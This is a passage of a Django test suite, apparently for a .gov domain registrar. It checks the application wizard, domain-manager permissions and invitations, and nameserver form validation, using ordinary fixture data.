organization_type=\"federal\",\n federal_type=\"executive\",\n purpose=\"Purpose of the site\",\n anything_else=\"No\",\n is_policy_acknowledged=True,\n organization_name=\"Testorg\",\n address_line1=\"address 1\",\n state_territory=\"NY\",\n zipcode=\"10002\",\n authorizing_official=ao,\n requested_domain=domain,\n submitter=you,\n creator=self.user,\n )\n application.other_contacts.add(other)\n application.current_websites.add(current)\n application.alternative_domains.add(alt)\n\n # prime the form by visiting /edit\n url = reverse(\"edit-application\", kwargs={\"id\": application.pk})\n response = self.client.get(url)\n\n # TODO: this is a sketch of each page in the wizard which needs to be tested\n # Django does not have tools sufficient for real end to end integration testing\n # (for example, USWDS moves radio buttons off 
screen and replaces them with\n # CSS styled \"fakes\" -- Django cannot determine if those are visually correct)\n # -- the best that can/should be done here is to ensure the correct values\n # are being passed to the templating engine\n\n url = reverse(\"application:organization_type\")\n response = self.client.get(url, follow=True)\n self.assertContains(response, \"\")\n # choices = response.context['wizard']['form']['organization_type'].subwidgets\n # radio = [ x for x in choices if x.data[\"value\"] == \"federal\" ][0]\n # checked = radio.data[\"selected\"]\n # self.assertTrue(checked)\n\n # url = reverse(\"application:organization_federal\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:organization_contact\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:authorizing_official\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:current_sites\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:dotgov_domain\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:purpose\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:your_contact\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:other_contacts\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:other_contacts\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:security_email\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:anything_else\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:requirements\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n def test_long_org_name_in_application(self):\n \"\"\"\n Make sure the long name is displaying in the application form,\n org step\n \"\"\"\n request = self.app.get(reverse(\"application:\")).follow()\n self.assertContains(request, \"Federal: an agency of the U.S. 
government\")\n\n def test_long_org_name_in_application_manage(self):\n \"\"\"\n Make sure the long name is displaying in the application summary\n page (manage your application)\n \"\"\"\n completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Edit\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"Federal: an agency of the U.S. government\")\n\n def test_submit_modal_no_domain_text_fallback(self):\n \"\"\"When user clicks on submit your domain request and the requested domain\n is null (possible through url direct access to the review page), present\n fallback copy in the modal's header.\n\n NOTE: This may be a moot point if we implement a more solid pattern in the\n future, like not a submit action at all on the review page.\"\"\"\n\n review_page = self.app.get(reverse(\"application:review\"))\n self.assertContains(review_page, \"toggle-submit-domain-request\")\n self.assertContains(review_page, \"You are about to submit an incomplete request\")\n\n\nclass TestWithDomainPermissions(TestWithUser):\n def setUp(self):\n super().setUp()\n self.domain, _ = Domain.objects.get_or_create(name=\"igorville.gov\")\n self.domain_with_ip, _ = Domain.objects.get_or_create(name=\"nameserverwithip.gov\")\n self.domain_just_nameserver, _ = Domain.objects.get_or_create(name=\"justnameserver.com\")\n self.domain_no_information, _ = Domain.objects.get_or_create(name=\"noinformation.gov\")\n self.domain_on_hold, _ = Domain.objects.get_or_create(name=\"on-hold.gov\", state=Domain.State.ON_HOLD)\n self.domain_deleted, _ = Domain.objects.get_or_create(name=\"deleted.gov\", state=Domain.State.DELETED)\n\n self.domain_dsdata, _ = Domain.objects.get_or_create(name=\"dnssec-dsdata.gov\")\n self.domain_multdsdata, _ = Domain.objects.get_or_create(name=\"dnssec-multdsdata.gov\")\n # We could simply use domain (igorville) but this will be more readable in tests\n # that inherit this setUp\n self.domain_dnssec_none, _ = Domain.objects.get_or_create(name=\"dnssec-none.gov\")\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_dsdata)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_multdsdata)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_dnssec_none)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_with_ip)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_just_nameserver)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_on_hold)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_deleted)\n\n self.role, _ = UserDomainRole.objects.get_or_create(\n user=self.user, domain=self.domain, role=UserDomainRole.Roles.MANAGER\n )\n\n UserDomainRole.objects.get_or_create(\n user=self.user, domain=self.domain_dsdata, role=UserDomainRole.Roles.MANAGER\n )\n UserDomainRole.objects.get_or_create(\n user=self.user,\n domain=self.domain_multdsdata,\n role=UserDomainRole.Roles.MANAGER,\n )\n UserDomainRole.objects.get_or_create(\n user=self.user,\n domain=self.domain_dnssec_none,\n role=UserDomainRole.Roles.MANAGER,\n )\n UserDomainRole.objects.get_or_create(\n user=self.user,\n domain=self.domain_with_ip,\n 
role=UserDomainRole.Roles.MANAGER,\n )\n UserDomainRole.objects.get_or_create(\n user=self.user,\n domain=self.domain_just_nameserver,\n role=UserDomainRole.Roles.MANAGER,\n )\n UserDomainRole.objects.get_or_create(\n user=self.user, domain=self.domain_on_hold, role=UserDomainRole.Roles.MANAGER\n )\n UserDomainRole.objects.get_or_create(\n user=self.user, domain=self.domain_deleted, role=UserDomainRole.Roles.MANAGER\n )\n\n def tearDown(self):\n try:\n UserDomainRole.objects.all().delete()\n if hasattr(self.domain, \"contacts\"):\n self.domain.contacts.all().delete()\n DomainApplication.objects.all().delete()\n DomainInformation.objects.all().delete()\n PublicContact.objects.all().delete()\n Domain.objects.all().delete()\n UserDomainRole.objects.all().delete()\n except ValueError: # pass if already deleted\n pass\n super().tearDown()\n\n\nclass TestDomainPermissions(TestWithDomainPermissions):\n def test_not_logged_in(self):\n \"\"\"Not logged in gets a redirect to Login.\"\"\"\n for view_name in [\n \"domain\",\n \"domain-users\",\n \"domain-users-add\",\n \"domain-dns-nameservers\",\n \"domain-org-name-address\",\n \"domain-authorizing-official\",\n \"domain-your-contact-information\",\n \"domain-security-email\",\n ]:\n with self.subTest(view_name=view_name):\n response = self.client.get(reverse(view_name, kwargs={\"pk\": self.domain.id}))\n self.assertEqual(response.status_code, 302)\n\n def test_no_domain_role(self):\n \"\"\"Logged in but no role gets 403 Forbidden.\"\"\"\n self.client.force_login(self.user)\n self.role.delete() # user no longer has a role on this domain\n\n for view_name in [\n \"domain\",\n \"domain-users\",\n \"domain-users-add\",\n \"domain-dns-nameservers\",\n \"domain-org-name-address\",\n \"domain-authorizing-official\",\n \"domain-your-contact-information\",\n \"domain-security-email\",\n ]:\n with self.subTest(view_name=view_name):\n with less_console_noise():\n response = self.client.get(reverse(view_name, kwargs={\"pk\": self.domain.id}))\n self.assertEqual(response.status_code, 403)\n\n def test_domain_pages_blocked_for_on_hold_and_deleted(self):\n \"\"\"Test that the domain pages are blocked for on hold and deleted domains\"\"\"\n\n self.client.force_login(self.user)\n for view_name in [\n \"domain-users\",\n \"domain-users-add\",\n \"domain-dns\",\n \"domain-dns-nameservers\",\n \"domain-dns-dnssec\",\n \"domain-dns-dnssec-dsdata\",\n \"domain-org-name-address\",\n \"domain-authorizing-official\",\n \"domain-your-contact-information\",\n \"domain-security-email\",\n ]:\n for domain in [\n self.domain_on_hold,\n self.domain_deleted,\n ]:\n with self.subTest(view_name=view_name, domain=domain):\n with less_console_noise():\n response = self.client.get(reverse(view_name, kwargs={\"pk\": domain.id}))\n self.assertEqual(response.status_code, 403)\n\n\nclass TestDomainOverview(TestWithDomainPermissions, WebTest):\n def setUp(self):\n super().setUp()\n self.app.set_user(self.user.username)\n self.client.force_login(self.user)\n\n\nclass TestDomainDetail(TestDomainOverview):\n def test_domain_detail_link_works(self):\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"igorville.gov\")\n # click the \"Edit\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"igorville.gov\")\n self.assertContains(detail_page, \"Status\")\n\n def test_domain_detail_blocked_for_ineligible_user(self):\n \"\"\"We could easily duplicate this test for all domain management\n views, but a single url test should be solid enough 
since all domain\n management pages share the same permissions class\"\"\"\n self.user.status = User.RESTRICTED\n self.user.save()\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"igorville.gov\")\n with less_console_noise():\n response = self.client.get(reverse(\"domain\", kwargs={\"pk\": self.domain.id}))\n self.assertEqual(response.status_code, 403)\n\n def test_domain_detail_allowed_for_on_hold(self):\n \"\"\"Test that the domain overview page displays for on hold domain\"\"\"\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"on-hold.gov\")\n\n # View domain overview page\n detail_page = self.client.get(reverse(\"domain\", kwargs={\"pk\": self.domain_on_hold.id}))\n self.assertNotContains(detail_page, \"Edit\")\n\n def test_domain_detail_see_just_nameserver(self):\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"justnameserver.com\")\n\n # View nameserver on Domain Overview page\n detail_page = self.app.get(reverse(\"domain\", kwargs={\"pk\": self.domain_just_nameserver.id}))\n\n self.assertContains(detail_page, \"justnameserver.com\")\n self.assertContains(detail_page, \"ns1.justnameserver.com\")\n self.assertContains(detail_page, \"ns2.justnameserver.com\")\n\n def test_domain_detail_see_nameserver_and_ip(self):\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"nameserverwithip.gov\")\n\n # View nameserver on Domain Overview page\n detail_page = self.app.get(reverse(\"domain\", kwargs={\"pk\": self.domain_with_ip.id}))\n\n self.assertContains(detail_page, \"nameserverwithip.gov\")\n\n self.assertContains(detail_page, \"ns1.nameserverwithip.gov\")\n self.assertContains(detail_page, \"ns2.nameserverwithip.gov\")\n self.assertContains(detail_page, \"ns3.nameserverwithip.gov\")\n # Splitting IP addresses bc there is odd whitespace and can't strip text\n self.assertContains(detail_page, \"(1.2.3.4,\")\n self.assertContains(detail_page, \"2.3.4.5)\")\n\n def test_domain_detail_with_no_information_or_application(self):\n \"\"\"Test that domain management page returns 200 and displays error\n when no domain information or domain application exist\"\"\"\n # have to use staff user for this test\n staff_user = create_user()\n # staff_user.save()\n self.client.force_login(staff_user)\n\n # need to set the analyst_action and analyst_action_location\n # in the session to emulate user clicking Manage Domain\n # in the admin interface\n session = self.client.session\n session[\"analyst_action\"] = \"foo\"\n session[\"analyst_action_location\"] = self.domain_no_information.id\n session.save()\n\n detail_page = self.client.get(reverse(\"domain\", kwargs={\"pk\": self.domain_no_information.id}))\n\n self.assertContains(detail_page, \"noinformation.gov\")\n self.assertContains(detail_page, \"Domain missing domain information\")\n\n\nclass TestDomainManagers(TestDomainOverview):\n def test_domain_managers(self):\n response = self.client.get(reverse(\"domain-users\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(response, \"Domain managers\")\n\n def test_domain_managers_add_link(self):\n \"\"\"Button to get to user add page works.\"\"\"\n management_page = self.app.get(reverse(\"domain-users\", kwargs={\"pk\": self.domain.id}))\n add_page = management_page.click(\"Add a domain manager\")\n self.assertContains(add_page, \"Add a domain manager\")\n\n def test_domain_user_add(self):\n response = self.client.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(response, \"Add a domain 
manager\")\n\n def test_domain_user_add_form(self):\n \"\"\"Adding an existing user works.\"\"\"\n other_user, _ = get_user_model().objects.get_or_create(email=\"mayor@igorville.gov\")\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n add_page.form[\"email\"] = \"mayor@igorville.gov\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_result = add_page.form.submit()\n\n self.assertEqual(success_result.status_code, 302)\n self.assertEqual(\n success_result[\"Location\"],\n reverse(\"domain-users\", kwargs={\"pk\": self.domain.id}),\n )\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_page = success_result.follow()\n self.assertContains(success_page, \"mayor@igorville.gov\")\n\n @boto3_mocking.patching\n def test_domain_invitation_created(self):\n \"\"\"Add user on a nonexistent email creates an invitation.\n\n Adding a non-existent user sends an email as a side-effect, so mock\n out the boto3 SES email sending here.\n \"\"\"\n # make sure there is no user with this email\n email_address = \"mayor@igorville.gov\"\n User.objects.filter(email=email_address).delete()\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n add_page.form[\"email\"] = email_address\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_result = add_page.form.submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_page = success_result.follow()\n\n self.assertContains(success_page, email_address)\n self.assertContains(success_page, \"Cancel\") # link to cancel invitation\n self.assertTrue(DomainInvitation.objects.filter(email=email_address).exists())\n\n @boto3_mocking.patching\n def test_domain_invitation_created_for_caps_email(self):\n \"\"\"Add user on a nonexistent email with CAPS creates an invitation to lowercase email.\n\n Adding a non-existent user sends an email as a side-effect, so mock\n out the boto3 SES email sending here.\n \"\"\"\n # make sure there is no user with this email\n email_address = \"mayor@igorville.gov\"\n caps_email_address = \"MAYOR@igorville.gov\"\n User.objects.filter(email=email_address).delete()\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n add_page.form[\"email\"] = caps_email_address\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_result = add_page.form.submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_page = success_result.follow()\n\n self.assertContains(success_page, email_address)\n self.assertContains(success_page, \"Cancel\") # link to cancel invitation\n self.assertTrue(DomainInvitation.objects.filter(email=email_address).exists())\n\n @boto3_mocking.patching\n def test_domain_invitation_email_sent(self):\n \"\"\"Inviting a non-existent user sends them an email.\"\"\"\n # make sure there is no user with this email\n email_address = \"mayor@igorville.gov\"\n User.objects.filter(email=email_address).delete()\n\n self.domain_information, _ = 
DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n mock_client = MagicMock()\n mock_client_instance = mock_client.return_value\n with boto3_mocking.clients.handler_for(\"sesv2\", mock_client):\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n add_page.form[\"email\"] = email_address\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n add_page.form.submit()\n # check the mock instance to see if `send_email` was called right\n mock_client_instance.send_email.assert_called_once_with(\n FromEmailAddress=settings.DEFAULT_FROM_EMAIL,\n Destination={\"ToAddresses\": [email_address]},\n Content=ANY,\n )\n\n def test_domain_invitation_cancel(self):\n \"\"\"Posting to the delete view deletes an invitation.\"\"\"\n email_address = \"mayor@igorville.gov\"\n invitation, _ = DomainInvitation.objects.get_or_create(domain=self.domain, email=email_address)\n self.client.post(reverse(\"invitation-delete\", kwargs={\"pk\": invitation.id}))\n with self.assertRaises(DomainInvitation.DoesNotExist):\n DomainInvitation.objects.get(id=invitation.id)\n\n def test_domain_invitation_cancel_no_permissions(self):\n \"\"\"Posting to the delete view as a different user should fail.\"\"\"\n email_address = \"mayor@igorville.gov\"\n invitation, _ = DomainInvitation.objects.get_or_create(domain=self.domain, email=email_address)\n\n other_user = User()\n other_user.save()\n self.client.force_login(other_user)\n with less_console_noise(): # permission denied makes console errors\n result = self.client.post(reverse(\"invitation-delete\", kwargs={\"pk\": invitation.id}))\n self.assertEqual(result.status_code, 403)\n\n @boto3_mocking.patching\n def test_domain_invitation_flow(self):\n \"\"\"Send an invitation to a new user, log in and load the dashboard.\"\"\"\n email_address = \"mayor@igorville.gov\"\n User.objects.filter(email=email_address).delete()\n\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n add_page.form[\"email\"] = email_address\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n add_page.form.submit()\n\n # user was invited, create them\n new_user = User.objects.create(username=email_address, email=email_address)\n # log them in to `self.app`\n self.app.set_user(new_user.username)\n # and manually call the on each login callback\n new_user.on_each_login()\n\n # Now load the home page and make sure our domain appears there\n home_page = self.app.get(reverse(\"home\"))\n self.assertContains(home_page, self.domain.name)\n\n\nclass TestDomainNameservers(TestDomainOverview):\n def test_domain_nameservers(self):\n \"\"\"Can load domain's nameservers page.\"\"\"\n page = self.client.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"DNS name servers\")\n\n def test_domain_nameservers_form_submit_one_nameserver(self):\n \"\"\"Nameserver form submitted with one nameserver throws error.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n 
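# NOTE: the captured session id is re-attached before each follow-up request so the wizard's session state survives across WebTest calls. A hypothetical helper for this recurring pattern (sketch only, not defined in this suite) might be:\n #\n # def restore_session(app, session_id):\n # \"\"\"Re-attach the Django session cookie to a WebTest app.\"\"\"\n # app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n 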
self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form with only one nameserver, should error\n # regarding required fields\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. form requires a minimum of 2 name servers\n self.assertContains(\n result,\n \"A minimum of 2 name servers are required.\",\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_subdomain_missing_ip(self):\n \"\"\"Nameserver form catches missing ip error on subdomain.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-1-server\"] = \"ns2.igorville.gov\"\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. subdomain missing an ip\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.MISSING_IP)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_missing_host(self):\n \"\"\"Nameserver form catches error when host is missing.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-1-ip\"] = \"127.0.0.1\"\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. 
nameserver has ip but missing host\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.MISSING_HOST)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_duplicate_host(self):\n \"\"\"Nameserver form catches error when host is duplicated.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form with duplicate host names of fake.host.com\n nameservers_page.form[\"form-0-ip\"] = \"\"\n nameservers_page.form[\"form-1-server\"] = \"fake.host.com\"\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. remove duplicate entry\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.DUPLICATE_HOST)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_whitespace(self):\n \"\"\"Nameserver form removes whitespace from ip.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver1 = \"ns1.igorville.gov\"\n nameserver2 = \"ns2.igorville.gov\"\n valid_ip = \"1.1. 1.1\"\n # initial nameservers page has one server with two ips\n # have to throw an error in order to test that the whitespace has been stripped from ip\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without one host and an ip with whitespace\n nameservers_page.form[\"form-0-server\"] = nameserver1\n nameservers_page.form[\"form-1-ip\"] = valid_ip\n nameservers_page.form[\"form-1-server\"] = nameserver2\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an ip address which has been stripped of whitespace,\n # response should be a 302 to success page\n self.assertEqual(result.status_code, 302)\n self.assertEqual(\n result[\"Location\"],\n reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}),\n )\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n page = result.follow()\n # in the event of a generic nameserver error from registry error, there will be a 302\n # with an error message displayed, so need to follow 302 and test for success message\n self.assertContains(page, \"The name servers for this domain have been updated\")\n\n def test_domain_nameservers_form_submit_glue_record_not_allowed(self):\n \"\"\"Nameserver form catches error when IP is present\n but host not subdomain.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver1 = \"ns1.igorville.gov\"\n nameserver2 = \"ns2.igorville.com\"\n valid_ip = \"127.0.0.1\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to 
submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-0-server\"] = nameserver1\n nameservers_page.form[\"form-1-server\"] = nameserver2\n nameservers_page.form[\"form-1-ip\"] = valid_ip\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. nameserver has ip but missing host\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.GLUE_RECORD_NOT_ALLOWED)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_invalid_ip(self):\n \"\"\"Nameserver form catches invalid IP on submission.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver = \"ns2.igorville.gov\"\n invalid_ip = \"123\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-1-server\"] = nameserver\n nameservers_page.form[\"form-1-ip\"] = invalid_ip\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. nameserver has ip but missing host\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.INVALID_IP, nameserver=nameserver)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_invalid_host(self):\n \"\"\"Nameserver form catches invalid host on submission.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver = \"invalid-nameserver.gov\"\n valid_ip = \"123.2.45.111\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-1-server\"] = nameserver\n nameservers_page.form[\"form-1-ip\"] = valid_ip\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. 
nameserver has invalid host\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.INVALID_HOST, nameserver=nameserver)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submits_successfully(self):\n \"\"\"Nameserver form submits successfully with valid input.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver1 = \"ns1.igorville.gov\"\n nameserver2 = \"ns2.igorville.gov\"\n valid_ip = \"127.0.0.1\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-0-server\"] = nameserver1\n nameservers_page.form[\"form-1-server\"] = nameserver2\n nameservers_page.form[\"form-1-ip\"] = valid_ip\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a successful post, response should be a 302\n self.assertEqual(result.status_code, 302)\n self.assertEqual(\n result[\"Location\"],\n reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}),\n )\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n page = result.follow()\n self.assertContains(page, \"The name servers for this domain have been updated\")\n\n def test_domain_nameservers_form_invalid(self):\n \"\"\"Nameserver form does not submit with invalid data.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n nameservers_page.form[\"form-0-server\"] = \"\"\n with less_console_noise(): # swallow logged warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears four times, twice at the top of the page,\n # once around each required field.\n self.assertContains(\n result,\n \"A minimum of 2 name servers are required.\",\n count=4,\n status_code=200,\n )\n\n\nclass TestDomainAuthorizingOfficial(TestDomainOverview):\n def test_domain_authorizing_official(self):\n \"\"\"Can load domain's authorizing official page.\"\"\"\n page = self.client.get(reverse(\"domain-authorizing-official\", kwargs={\"pk\": self.domain.id}))\n # once on the sidebar, once in the title\n self.assertContains(page, \"Authorizing official\", count=2)\n\n def test_domain_authorizing_official_content(self):\n \"\"\"Authorizing official information appears on the page.\"\"\"\n self.domain_information.authorizing_official = Contact(first_name=\"Testy\")\n self.domain_information.authorizing_official.save()\n self.domain_information.save()\n page = self.app.get(reverse(\"domain-authorizing-official\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Testy\")\n\n\nclass TestDomainOrganization(TestDomainOverview):\n def test_domain_org_name_address(self):\n \"\"\"Can load domain's org name and mailing address page.\"\"\"\n page = self.client.get(reverse(\"domain-org-name-address\", 